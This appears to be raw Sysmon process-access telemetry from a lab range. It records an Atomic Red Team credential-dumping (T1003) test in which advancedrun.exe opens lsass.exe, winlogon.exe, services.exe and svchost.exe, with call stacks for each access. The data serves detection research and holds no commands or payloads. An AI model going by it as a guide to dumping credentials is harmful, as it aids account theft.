17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003953126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 